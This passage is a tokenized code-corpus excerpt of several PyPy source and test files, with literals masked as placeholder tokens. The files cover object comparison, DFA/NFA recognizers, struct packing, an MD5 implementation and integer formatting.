) <EOL> assert <NUM_LIT:0> L < ( ) <EOL> assert <NUM_LIT:0.0> < ( ) <EOL> assert <NUM_LIT> < ( ) <EOL> assert <NUM_LIT:0> < [ ] <EOL> assert <NUM_LIT:0> L < [ ] <EOL> assert <NUM_LIT:0.0> < [ ] <EOL> assert <NUM_LIT> < [ ] <EOL> assert <NUM_LIT:0> < A ( ) <EOL> assert <NUM_LIT:0> L < A ( ) <EOL> assert <NUM_LIT:0.0> < A ( ) <EOL> assert <NUM_LIT> < A ( ) <EOL> assert <NUM_LIT:0> < zz ( ) <EOL> assert <NUM_LIT:0> L < zz ( ) <EOL> assert <NUM_LIT:0.0> < zz ( ) <EOL> assert <NUM_LIT> < zz ( ) <EOL> a1 = A ( ) <EOL> a2 = A ( ) <EOL> class A ( object ) : pass <EOL> a3 = A ( ) <EOL> a4 = A ( ) <EOL> assert ( a1 < a3 ) == ( a1 < a4 ) == ( a2 < a3 ) == ( a2 < a4 ) <EOL> def test_setattrweakref ( self ) : <EOL> skip ( "<STR_LIT>" ) <EOL> class P ( object ) : <EOL> pass <EOL> setattr ( P , "<STR_LIT>" , <NUM_LIT:0> ) <EOL> def test_subclass_comparison ( self ) : <EOL> l = [ ] <EOL> class A ( object ) : <EOL> def __eq__ ( self , other ) : <EOL> l . append ( self . __class__ ) <EOL> l . append ( other . __class__ ) <EOL> return False <EOL> def __lt__ ( self , other ) : <EOL> l . append ( self . __class__ ) <EOL> l . append ( other . __class__ ) <EOL> return False <EOL> class B ( A ) : <EOL> pass <EOL> A ( ) == B ( ) <EOL> A ( ) < B ( ) <EOL> assert l == [ B , A , A , B ] <EOL> class AppTestWithBuiltinShortcut ( AppTest_Descroperation ) : <EOL> OPTIONS = { '<STR_LIT>' : True } </s>
<s> from pypy . rlib . parsing . deterministic import * <EOL> from sets import Set <EOL> def test_DFA_simple ( ) : <EOL> a = DFA ( ) <EOL> s0 = a . add_state ( "<STR_LIT:start>" ) <EOL> s1 = a . add_state ( ) <EOL> s2 = a . add_state ( final = True ) <EOL> a [ s0 , "<STR_LIT:a>" ] = s0 <EOL> a [ s0 , "<STR_LIT:c>" ] = s1 <EOL> a [ s0 , "<STR_LIT:b>" ] = s2 <EOL> a [ s1 , "<STR_LIT:b>" ] = s2 <EOL> r = DFARunner ( a ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT:b>" ) <EOL> assert not r . recognize ( "<STR_LIT:a>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> recognize = a . make_code ( ) <EOL> assert recognize ( "<STR_LIT>" ) <EOL> assert recognize ( "<STR_LIT:b>" ) <EOL> assert py . test . raises ( LexerError , "<STR_LIT>" ) <EOL> assert py . test . raises ( LexerError , "<STR_LIT>" ) <EOL> assert recognize ( "<STR_LIT>" ) <EOL> def test_compile_recognizer ( ) : <EOL> try : <EOL> from pypy . translator . interactive import Translation <EOL> except ImportError : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> a = DFA ( ) <EOL> s0 = a . add_state ( "<STR_LIT:start>" ) <EOL> s1 = a . add_state ( ) <EOL> s2 = a . add_state ( final = True ) <EOL> a [ s0 , "<STR_LIT:a>" ] = s0 <EOL> a [ s0 , "<STR_LIT:c>" ] = s1 <EOL> a [ s0 , "<STR_LIT:b>" ] = s2 <EOL> a [ s1 , "<STR_LIT:b>" ] = s2 <EOL> recognize = a . make_code ( ) <EOL> t = Translation ( recognize ) <EOL> t . backendopt ( [ str ] , backend = "<STR_LIT:c>" ) <EOL> cfn = t . compile_c ( ) <EOL> assert cfn ( "<STR_LIT>" ) <EOL> assert cfn ( "<STR_LIT:b>" ) <EOL> assert cfn ( "<STR_LIT>" ) <EOL> def test_NFA_simple ( ) : <EOL> a = NFA ( ) <EOL> z0 = a . add_state ( "<STR_LIT>" , start = True ) <EOL> z1 = a . add_state ( "<STR_LIT>" , start = True ) <EOL> z2 = a . add_state ( "<STR_LIT>" , final = True ) <EOL> a . add_transition ( z0 , z0 , "<STR_LIT:0>" ) <EOL> a . add_transition ( z0 , z1 , "<STR_LIT:0>" ) <EOL> a . add_transition ( z0 , z0 , "<STR_LIT:1>" ) <EOL> a . add_transition ( z1 , z2 , "<STR_LIT:0>" ) <EOL> r = SetNFARunner ( a ) <EOL> assert r . recognize ( "<STR_LIT:0>" ) <EOL> assert r . recognize ( "<STR_LIT:100>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> r = BacktrackingNFARunner ( a ) <EOL> assert r . recognize ( "<STR_LIT:0>" ) <EOL> assert r . recognize ( "<STR_LIT:100>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> def test_NFA_with_epsilon ( ) : <EOL> a = NFA ( ) <EOL> z0 = a . add_state ( "<STR_LIT>" , start = True ) <EOL> z1 = a . add_state ( "<STR_LIT>" ) <EOL> z2 = a . add_state ( "<STR_LIT>" , final = True ) <EOL> a . add_transition ( z0 , z1 ) <EOL> a . add_transition ( z0 , z1 , "<STR_LIT:a>" ) <EOL> a . add_transition ( z1 , z2 , "<STR_LIT:b>" ) <EOL> r = SetNFARunner ( a ) <EOL> assert r . recognize ( "<STR_LIT:b>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> r = BacktrackingNFARunner ( a ) <EOL> assert r . recognize ( "<STR_LIT:b>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> fda = a . make_deterministic ( ) <EOL> r = fda . get_runner ( ) <EOL> def test_NFA_to_DFA_simple ( ) : <EOL> a = NFA ( ) <EOL> z0 = a . add_state ( "<STR_LIT>" , start = True ) <EOL> z1 = a . add_state ( "<STR_LIT>" , start = True ) <EOL> z2 = a . add_state ( "<STR_LIT>" , final = True ) <EOL> a . add_transition ( z0 , z0 , "<STR_LIT:0>" ) <EOL> a . add_transition ( z0 , z1 , "<STR_LIT:0>" ) <EOL> a . add_transition ( z0 , z0 , "<STR_LIT:1>" ) <EOL> a . add_transition ( z1 , z2 , "<STR_LIT:0>" ) <EOL> fda = a . make_deterministic ( ) <EOL> r = DFARunner ( fda ) <EOL> assert r . recognize ( "<STR_LIT:0>" ) <EOL> assert r . recognize ( "<STR_LIT:100>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> def test_simplify ( ) : <EOL> a = DFA ( ) <EOL> z0 = a . add_state ( "<STR_LIT>" ) <EOL> z1 = a . add_state ( "<STR_LIT>" ) <EOL> z2 = a . add_state ( "<STR_LIT>" ) <EOL> z3 = a . add_state ( "<STR_LIT>" ) <EOL> z4 = a . add_state ( "<STR_LIT>" , final = True ) <EOL> a [ z0 , "<STR_LIT:1>" ] = z2 <EOL> a [ z0 , "<STR_LIT:0>" ] = z1 <EOL> a [ z1 , "<STR_LIT:1>" ] = z2 <EOL> a [ z1 , "<STR_LIT:0>" ] = z4 <EOL> a [ z2 , "<STR_LIT:1>" ] = z2 <EOL> a [ z2 , "<STR_LIT:0>" ] = z3 <EOL> a [ z3 , "<STR_LIT:0>" ] = z4 <EOL> a [ z3 , "<STR_LIT:1>" ] = z0 <EOL> a [ z4 , "<STR_LIT:0>" ] = z4 <EOL> a [ z4 , "<STR_LIT:1>" ] = z4 <EOL> a . optimize ( ) <EOL> r = a . get_runner ( ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT:0>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> newa = eval ( repr ( a ) ) <EOL> r = newa . get_runner ( ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT:0>" ) <EOL> assert r . recognize ( "<STR_LIT>" ) <EOL> assert not r . recognize ( "<STR_LIT>" ) <EOL> def test_something ( ) : <EOL> a = NFA ( ) <EOL> z0 = a . add_state ( "<STR_LIT>" , start = True , final = True ) <EOL> z1 = a . add_state ( "<STR_LIT>" ) <EOL> z2 = a . add_state ( "<STR_LIT>" , start = True , final = True ) <EOL> a . add_transition ( z0 , z1 , "<STR_LIT:a>" ) <EOL> a . add_transition ( z1 , z0 , "<STR_LIT:b>" ) <EOL> a . add_transition ( z1 , z1 , "<STR_LIT:a>" ) <EOL> a . add_transition ( z1 , z1 , "<STR_LIT:b>" ) <EOL> a . add_transition ( z1 , z2 , "<STR_LIT:a>" ) <EOL> fda = a . make_deterministic ( ) <EOL> def test_compress_char_set ( ) : <EOL> import string <EOL> assert compress_char_set ( "<STR_LIT>" ) == [ ( '<STR_LIT:a>' , <NUM_LIT:1> ) , ( '<STR_LIT:c>' , <NUM_LIT:1> ) , ( '<STR_LIT:e>' , <NUM_LIT:1> ) ] <EOL> assert compress_char_set ( "<STR_LIT>" ) == [ ( '<STR_LIT:a>' , <NUM_LIT:7> ) ] <EOL> assert compress_char_set ( "<STR_LIT>" ) == [ ( '<STR_LIT:A>' , <NUM_LIT:3> ) , ( '<STR_LIT:a>' , <NUM_LIT:3> ) ] <EOL> assert compress_char_set ( "<STR_LIT>" ) == [ ( '<STR_LIT:a>' , <NUM_LIT:3> ) , ( '<STR_LIT:y>' , <NUM_LIT:2> ) ] <EOL> assert compress_char_set ( string . ascii_letters ) == [ ( '<STR_LIT:A>' , <NUM_LIT> ) , ( '<STR_LIT:a>' , <NUM_LIT> ) ] <EOL> assert compress_char_set ( string . printable ) == [ ( '<STR_LIT:U+0020>' , <NUM_LIT> ) , ( '<STR_LIT:\t>' , <NUM_LIT:5> ) ] <EOL> def test_make_nice_charset_repr ( ) : <EOL> import string <EOL> assert make_nice_charset_repr ( "<STR_LIT>" ) == '<STR_LIT>' <EOL> assert make_nice_charset_repr ( "<STR_LIT>" ) == '<STR_LIT>' <EOL> assert make_nice_charset_repr ( "<STR_LIT>" ) == '<STR_LIT>' <EOL> assert make_nice_charset_repr ( "<STR_LIT>" ) == '<STR_LIT>' <EOL> assert make_nice_charset_repr ( string . ascii_letters ) == '<STR_LIT>' <EOL> nice = make_nice_charset_repr ( string . printable ) <EOL> chunks = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> chunks += list ( '<STR_LIT>' ) <EOL> for chunk in chunks : <EOL> assert chunk in nice <EOL> assert len ( '<STR_LIT>' . join ( chunks ) ) == len ( nice ) </s>
<s> import sys <EOL> from pypy . rpython . lltypesystem import lltype , rffi <EOL> from pypy . rpython . tool import rffi_platform as platform <EOL> from pypy . translator . tool . cbuild import ExternalCompilationInfo <EOL> from pypy . rlib . rsdl import RSDL <EOL> if sys . platform == '<STR_LIT>' : <EOL> eci = ExternalCompilationInfo ( <EOL> includes = [ '<STR_LIT>' ] , <EOL> frameworks = [ '<STR_LIT>' ] , <EOL> include_dirs = [ '<STR_LIT>' ] <EOL> ) <EOL> else : <EOL> eci = ExternalCompilationInfo ( <EOL> includes = [ '<STR_LIT>' ] , <EOL> libraries = [ '<STR_LIT>' ] , <EOL> ) <EOL> eci = eci . merge ( RSDL . eci ) <EOL> def external ( name , args , result ) : <EOL> return rffi . llexternal ( name , args , result , compilation_info = eci ) <EOL> Load = external ( '<STR_LIT>' , [ rffi . CCHARP ] , RSDL . SurfacePtr ) </s>
<s> """<STR_LIT>""" <EOL> import struct <EOL> from pypy . rlib . rstruct import standardfmttable as std <EOL> from pypy . rlib . rstruct . error import StructError <EOL> from pypy . rpython . tool import rffi_platform <EOL> from pypy . rpython . lltypesystem import lltype , rffi <EOL> from pypy . rlib . rarithmetic import r_singlefloat <EOL> from pypy . translator . tool . cbuild import ExternalCompilationInfo <EOL> from pypy . rlib . objectmodel import specialize <EOL> native_is_bigendian = struct . pack ( "<STR_LIT>" , <NUM_LIT:1> ) == struct . pack ( "<STR_LIT>" , <NUM_LIT:1> ) <EOL> native_fmttable = { <EOL> '<STR_LIT:x>' : std . standard_fmttable [ '<STR_LIT:x>' ] , <EOL> '<STR_LIT:c>' : std . standard_fmttable [ '<STR_LIT:c>' ] , <EOL> '<STR_LIT:s>' : std . standard_fmttable [ '<STR_LIT:s>' ] , <EOL> '<STR_LIT:p>' : std . standard_fmttable [ '<STR_LIT:p>' ] , <EOL> } <EOL> double_buf = lltype . malloc ( rffi . DOUBLEP . TO , <NUM_LIT:1> , flavor = '<STR_LIT>' , immortal = True ) <EOL> float_buf = lltype . malloc ( rffi . FLOATP . TO , <NUM_LIT:1> , flavor = '<STR_LIT>' , immortal = True ) <EOL> def pack_double ( fmtiter ) : <EOL> doubleval = fmtiter . accept_float_arg ( ) <EOL> double_buf [ <NUM_LIT:0> ] = doubleval <EOL> p = rffi . cast ( rffi . CCHARP , double_buf ) <EOL> for i in range ( sizeof_double ) : <EOL> fmtiter . result . append ( p [ i ] ) <EOL> @ specialize . argtype ( <NUM_LIT:0> ) <EOL> def unpack_double ( fmtiter ) : <EOL> input = fmtiter . read ( sizeof_double ) <EOL> p = rffi . cast ( rffi . CCHARP , double_buf ) <EOL> for i in range ( sizeof_double ) : <EOL> p [ i ] = input [ i ] <EOL> doubleval = double_buf [ <NUM_LIT:0> ] <EOL> fmtiter . appendobj ( doubleval ) <EOL> def pack_float ( fmtiter ) : <EOL> doubleval = fmtiter . accept_float_arg ( ) <EOL> floatval = r_singlefloat ( doubleval ) <EOL> float_buf [ <NUM_LIT:0> ] = floatval <EOL> p = rffi . cast ( rffi . CCHARP , float_buf ) <EOL> for i in range ( sizeof_float ) : <EOL> fmtiter . result . append ( p [ i ] ) <EOL> @ specialize . argtype ( <NUM_LIT:0> ) <EOL> def unpack_float ( fmtiter ) : <EOL> input = fmtiter . read ( sizeof_float ) <EOL> p = rffi . cast ( rffi . CCHARP , float_buf ) <EOL> for i in range ( sizeof_float ) : <EOL> p [ i ] = input [ i ] <EOL> floatval = float_buf [ <NUM_LIT:0> ] <EOL> doubleval = float ( floatval ) <EOL> fmtiter . appendobj ( doubleval ) <EOL> def setup ( ) : <EOL> INSPECT = { '<STR_LIT:b>' : '<STR_LIT>' , <EOL> '<STR_LIT:h>' : '<STR_LIT>' , <EOL> '<STR_LIT:i>' : '<STR_LIT>' , <EOL> '<STR_LIT:l>' : '<STR_LIT>' , <EOL> '<STR_LIT:q>' : '<STR_LIT>' , <EOL> '<STR_LIT:B>' : '<STR_LIT>' , <EOL> '<STR_LIT:H>' : '<STR_LIT>' , <EOL> '<STR_LIT:I>' : '<STR_LIT>' , <EOL> '<STR_LIT:L>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:P>' : '<STR_LIT>' , <EOL> '<STR_LIT:f>' : '<STR_LIT:float>' , <EOL> '<STR_LIT:d>' : '<STR_LIT>' , <EOL> } <EOL> pre_include_bits = [ ] <EOL> for fmtchar , ctype in INSPECT . items ( ) : <EOL> pre_include_bits . append ( """<STR_LIT>""" % ( fmtchar , ctype ) ) <EOL> class CConfig : <EOL> _compilation_info_ = ExternalCompilationInfo ( <EOL> pre_include_bits = pre_include_bits <EOL> ) <EOL> for fmtchar , ctype in INSPECT . items ( ) : <EOL> setattr ( CConfig , fmtchar , rffi_platform . Struct ( <EOL> "<STR_LIT>" % ( fmtchar , ) , <EOL> [ ( '<STR_LIT>' , lltype . FixedSizeArray ( rffi . CHAR , <NUM_LIT:1> ) ) ] ) ) <EOL> cConfig = rffi_platform . configure ( CConfig ) <EOL> for fmtchar , ctype in INSPECT . items ( ) : <EOL> S = cConfig [ fmtchar ] <EOL> alignment = rffi . offsetof ( S , '<STR_LIT>' ) <EOL> size = rffi . sizeof ( S . c_field ) <EOL> signed = '<STR_LIT:a>' <= fmtchar <= '<STR_LIT:z>' <EOL> if fmtchar == '<STR_LIT:f>' : <EOL> pack = pack_float <EOL> unpack = unpack_float <EOL> elif fmtchar == '<STR_LIT:d>' : <EOL> pack = pack_double <EOL> unpack = unpack_double <EOL> else : <EOL> cpython_checks_range = fmtchar in '<STR_LIT>' <EOL> pack = std . make_int_packer ( size , signed , cpython_checks_range ) <EOL> unpack = std . make_int_unpacker ( size , signed ) <EOL> native_fmttable [ fmtchar ] = { '<STR_LIT:size>' : size , <EOL> '<STR_LIT>' : alignment , <EOL> '<STR_LIT>' : pack , <EOL> '<STR_LIT>' : unpack } <EOL> setup ( ) <EOL> sizeof_double = native_fmttable [ '<STR_LIT:d>' ] [ '<STR_LIT:size>' ] <EOL> sizeof_float = native_fmttable [ '<STR_LIT:f>' ] [ '<STR_LIT:size>' ] <EOL> from pypy . rlib . rstruct import unichar <EOL> def pack_unichar ( fmtiter ) : <EOL> unistr = fmtiter . accept_unicode_arg ( ) <EOL> if len ( unistr ) != <NUM_LIT:1> : <EOL> raise StructError ( "<STR_LIT>" ) <EOL> c = unistr [ <NUM_LIT:0> ] <EOL> unichar . pack_unichar ( c , fmtiter . result ) <EOL> @ specialize . argtype ( <NUM_LIT:0> ) <EOL> def unpack_unichar ( fmtiter ) : <EOL> data = fmtiter . read ( unichar . UNICODE_SIZE ) <EOL> fmtiter . appendobj ( unichar . unpack_unichar ( data ) ) <EOL> native_fmttable [ '<STR_LIT:u>' ] = { '<STR_LIT:size>' : unichar . UNICODE_SIZE , <EOL> '<STR_LIT>' : unichar . UNICODE_SIZE , <EOL> '<STR_LIT>' : pack_unichar , <EOL> '<STR_LIT>' : unpack_unichar , <EOL> } </s>
<s> import md5 <EOL> from pypy . rlib import rmd5 <EOL> def test_digest_size ( ) : <EOL> assert rmd5 . digest_size == <NUM_LIT:16> <EOL> def test_cases ( ) : <EOL> """<STR_LIT>""" <EOL> cases = ( <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT:a>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT:abc>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" * <NUM_LIT:8> , <EOL> "<STR_LIT>" ) , <EOL> ) <EOL> for input , expected in cases : <EOL> d = rmd5 . RMD5 ( ) <EOL> d . update ( input ) <EOL> assert d . hexdigest ( ) == expected <EOL> assert d . digest ( ) == expected . decode ( '<STR_LIT>' ) <EOL> def test_more ( ) : <EOL> "<STR_LIT>" <EOL> cases = ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> for input in cases : <EOL> d = rmd5 . RMD5 ( input ) <EOL> assert d . hexdigest ( ) == md5 . md5 ( input ) . hexdigest ( ) <EOL> assert d . digest ( ) == md5 . md5 ( input ) . digest ( ) <EOL> def test_long ( ) : <EOL> "<STR_LIT>" <EOL> cases = ( <EOL> <NUM_LIT:2> ** <NUM_LIT:10> * '<STR_LIT:a>' , <EOL> <NUM_LIT:2> ** <NUM_LIT:10> * '<STR_LIT>' , <EOL> ) <EOL> for input in cases : <EOL> d = rmd5 . RMD5 ( input ) <EOL> assert d . hexdigest ( ) == md5 . md5 ( input ) . hexdigest ( ) <EOL> assert d . digest ( ) == md5 . md5 ( input ) . digest ( ) <EOL> def test_updating_many_times ( ) : <EOL> "<STR_LIT>" <EOL> d1 = rmd5 . RMD5 ( ) <EOL> d2 = md5 . md5 ( ) <EOL> for i in range ( <NUM_LIT> ) : <EOL> d1 . update ( chr ( i & <NUM_LIT> ) ) <EOL> d2 . update ( chr ( i & <NUM_LIT> ) ) <EOL> assert d1 . digest ( ) == d2 . digest ( ) <EOL> def test_copy ( ) : <EOL> "<STR_LIT>" <EOL> cases = ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> prefix1 = <NUM_LIT:2> ** <NUM_LIT:10> * '<STR_LIT:a>' <EOL> m1 = md5 . md5 ( ) <EOL> m1 . update ( prefix1 ) <EOL> m2 = rmd5 . RMD5 ( ) <EOL> m2 . update ( prefix1 ) <EOL> for message in cases : <EOL> m1c = m1 . copy ( ) <EOL> m1c . update ( message ) <EOL> d1 = m1c . hexdigest ( ) <EOL> m2c = m2 . copy ( ) <EOL> m2c . update ( message ) <EOL> d2 = m2c . hexdigest ( ) <EOL> assert d1 == d2 <EOL> def test_random ( ) : <EOL> import random , md5 <EOL> for i in range ( <NUM_LIT:20> ) : <EOL> input = '<STR_LIT>' . join ( [ chr ( random . randrange ( <NUM_LIT> ) ) <EOL> for i in range ( random . randrange ( <NUM_LIT:1000> ) ) ] ) <EOL> m1 = rmd5 . RMD5 ( ) <EOL> m1 . update ( input ) <EOL> m2 = md5 . new ( ) <EOL> m2 . update ( input ) <EOL> assert m2 . hexdigest ( ) == m1 . hexdigest ( ) </s>
<s> from pypy . rpython . lltypesystem . lltype import GcArray , Array , Char , malloc <EOL> from pypy . rpython . annlowlevel import llstr <EOL> from pypy . rlib . rarithmetic import r_uint , formatd <EOL> CHAR_ARRAY = GcArray ( Char ) <EOL> def ll_int_str ( repr , i ) : <EOL> return ll_int2dec ( i ) <EOL> ll_int_str . _pure_function_ = True <EOL> def ll_int2dec ( i ) : <EOL> from pypy . rpython . lltypesystem . rstr import mallocstr <EOL> temp = malloc ( CHAR_ARRAY , <NUM_LIT:20> ) <EOL> len = <NUM_LIT:0> <EOL> sign = <NUM_LIT:0> <EOL> if i < <NUM_LIT:0> : <EOL> sign = <NUM_LIT:1> <EOL> i = r_uint ( - i ) <EOL> else : <EOL> i = r_uint ( i ) <EOL> if i == <NUM_LIT:0> : <EOL> len = <NUM_LIT:1> <EOL> temp [ <NUM_LIT:0> ] = '<STR_LIT:0>' <EOL> else : <EOL> while i : <EOL> temp [ len ] = chr ( i % <NUM_LIT:10> + ord ( '<STR_LIT:0>' ) ) <EOL> i //= <NUM_LIT:10> <EOL> len += <NUM_LIT:1> <EOL> len += sign <EOL> result = mallocstr ( len ) <EOL> result . hash = <NUM_LIT:0> <EOL> if sign : <EOL> result . chars [ <NUM_LIT:0> ] = '<STR_LIT:->' <EOL> j = <NUM_LIT:1> <EOL> else : <EOL> j = <NUM_LIT:0> <EOL> while j < len : <EOL> result . chars [ j ] = temp [ len - j - <NUM_LIT:1> ] <EOL> j += <NUM_LIT:1> <EOL> return result <EOL> ll_int2dec . _pure_function_ = True <EOL> hex_chars = malloc ( Array ( Char ) , <NUM_LIT:16> , immortal = True ) <EOL> for i in range ( <NUM_LIT:16> ) : <EOL> hex_chars [ i ] = "<STR_LIT>" % i <EOL> def ll_int2hex ( i , addPrefix ) : <EOL> from pypy . rpython . lltypesystem . rstr import mallocstr <EOL> temp = malloc ( CHAR_ARRAY , <NUM_LIT:20> ) <EOL> len = <NUM_LIT:0> <EOL> sign = <NUM_LIT:0> <EOL> if i < <NUM_LIT:0> : <EOL> sign = <NUM_LIT:1> <EOL> i = r_uint ( - i ) <EOL> else : <EOL> i = r_uint ( i ) <EOL> if i == <NUM_LIT:0> : <EOL> len = <NUM_LIT:1> <EOL> temp [ <NUM_LIT:0> ] = '<STR_LIT:0>' <EOL> else : <EOL> while i : <EOL> temp [ len ] = hex_chars [ i & <NUM_LIT> ] <EOL> i >>= <NUM_LIT:4> <EOL> len += <NUM_LIT:1> <EOL> len += sign <EOL> if addPrefix : <EOL> len += <NUM_LIT:2> <EOL> result = mallocstr ( len ) <EOL> result . hash = <NUM_LIT:0> <EOL> j = <NUM_LIT:0> <EOL> if sign : <EOL> result . chars [ <NUM_LIT:0> ] = '<STR_LIT:->' <EOL> j = <NUM_LIT:1> <EOL> if addPrefix : <EOL> result . chars [ j ] = '<STR_LIT:0>' <EOL> result . chars [ j + <NUM_LIT:1> ] = '<STR_LIT:x>' <EOL> j += <NUM_LIT:2> <EOL> while j < len : <EOL> result . chars [ j ] = temp [ len - j - <NUM_LIT:1> ] <EOL> j += <NUM_LIT:1> <EOL> return result <EOL> ll_int2hex . _pure_function_ = True <EOL> def ll_int2oct ( i , addPrefix ) : <EOL> from pypy . rpython . lltypesystem . rstr import mallocstr <EOL> if i == <NUM_LIT:0> : <EOL> result = mallocstr ( <NUM_LIT:1> ) <EOL> result . hash = <NUM_LIT:0> <EOL> result . chars [ <NUM_LIT:0> ] = '<STR_LIT:0>' <EOL> return result <EOL> temp = malloc ( CHAR_ARRAY , <NUM_LIT> ) <EOL> len = <NUM_LIT:0> <EOL> sign = <NUM_LIT:0> <EOL> if i < <NUM_LIT:0> : <EOL> sign = <NUM_LIT:1> <EOL> i = r_uint ( - i ) <EOL> else : <EOL> i = r_uint ( i ) <EOL> while i : <EOL> temp [ len ] = hex_chars [ i & <NUM_LIT> ] <EOL> i >>= <NUM_LIT:3> <EOL> len += <NUM_LIT:1> <EOL> len += sign <EOL> if addPrefix : <EOL> len += <NUM_LIT:1> <EOL> result = mallocstr ( len ) <EOL> result . hash = <NUM_LIT:0> <EOL> j = <NUM_LIT:0> <EOL> if sign : <EOL> result . chars [ <NUM_LIT:0> ] = '<STR_LIT:->' <EOL> j = <NUM_LIT:1> <EOL> if addPrefix : <EOL> result . chars [ j ] = '<STR_LIT:0>' <EOL> j += <NUM_LIT:1> <EOL> while j < len : <EOL> result . chars [ j ] = temp [ len - j - <NUM_LIT:1> ] <EOL> j += <NUM_LIT:1> <EOL> return result <EOL> ll_int2oct . _pure_function_ = True <EOL> def ll_float_str ( repr , f ) : <EOL> return llstr ( formatd ( "<STR_LIT>" , f ) ) <EOL> ll_float_str . _pure_function_ = True </s>
<s> from pypy . rpython . lltypesystem . llmemory import * <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rpython . test . test_llinterp import interpret <EOL> import py <EOL> def test_simple ( ) : <EOL> S = lltype . GcStruct ( "<STR_LIT:S>" , ( "<STR_LIT:x>" , lltype . Signed ) , ( "<STR_LIT:y>" , lltype . Signed ) ) <EOL> s = lltype . malloc ( S ) <EOL> s . x = <NUM_LIT> <EOL> s . y = <NUM_LIT> <EOL> a = fakeaddress ( s ) <EOL> assert a . ref ( ) == s <EOL> b = a + FieldOffset ( S , '<STR_LIT:x>' ) <EOL> assert b . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> b . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s . x == <NUM_LIT> <EOL> def test_simple_float ( ) : <EOL> S = lltype . GcStruct ( "<STR_LIT:S>" , ( "<STR_LIT:x>" , lltype . Float ) , ( "<STR_LIT:y>" , lltype . Float ) ) <EOL> s = lltype . malloc ( S ) <EOL> s . x = <NUM_LIT> <EOL> s . y = <NUM_LIT> <EOL> a = fakeaddress ( s ) <EOL> assert a . ref ( ) == s <EOL> b = a + FieldOffset ( S , '<STR_LIT:x>' ) <EOL> assert b . float [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> b . float [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s . x == <NUM_LIT> <EOL> def test_composite ( ) : <EOL> S1 = lltype . GcStruct ( "<STR_LIT>" , ( "<STR_LIT:x>" , lltype . Signed ) , ( "<STR_LIT:y>" , lltype . Signed ) ) <EOL> S2 = lltype . GcStruct ( "<STR_LIT>" , ( "<STR_LIT:s>" , S1 ) ) <EOL> s2 = lltype . malloc ( S2 ) <EOL> s2 . s . x = <NUM_LIT> <EOL> s2 . s . y = <NUM_LIT> <EOL> a = fakeaddress ( s2 ) <EOL> assert a . ref ( ) == s2 <EOL> b = a + FieldOffset ( S2 , '<STR_LIT:s>' ) + FieldOffset ( S1 , '<STR_LIT:x>' ) <EOL> assert b . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> b . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s2 